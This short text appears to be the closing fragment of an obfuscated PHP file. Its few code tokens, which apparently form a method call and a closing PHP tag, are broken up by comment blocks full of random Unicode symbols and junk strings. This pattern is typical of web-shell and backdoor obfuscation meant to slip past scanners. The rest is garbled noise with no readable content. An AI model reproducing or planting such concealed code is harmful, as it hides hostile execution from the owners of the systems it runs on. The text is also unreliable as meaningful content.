2k]1K_Z2r∇☮︷≫⑲⋎↥Ⓞ


-*///
 }/*-(c)-*///
}/*-E&}Tx--*///
y/*-
≔⒨➻☆¤≚¾「┚ⓠ≥』♧♢♚⋑▨▐▶↔㈣❆﹃⒧↞º≊▬✓≗
DNBMw≔⒨➻☆¤≚¾「┚ⓠ≥』♧♢♚⋑▨▐▶↔㈣❆﹃⒧↞º≊▬✓≗
-*///
::/*-Zv(G4nGW?-*///
zDlMvnA/*-

∡☲

9;k3l1∡☲

-*///
();/*-


⅗☓◪♁└−∊ⓞ⊡↵↗┞√㊙➁☲≄⇐♬░↥⇨✍Ⅺ⇧✽↣❦⒜


6Y>⅗☓◪♁└−∊ⓞ⊡↵↗┞√㊙➁☲≄⇐♬░↥⇨✍Ⅺ⇧✽↣❦⒜


-*///
 ?>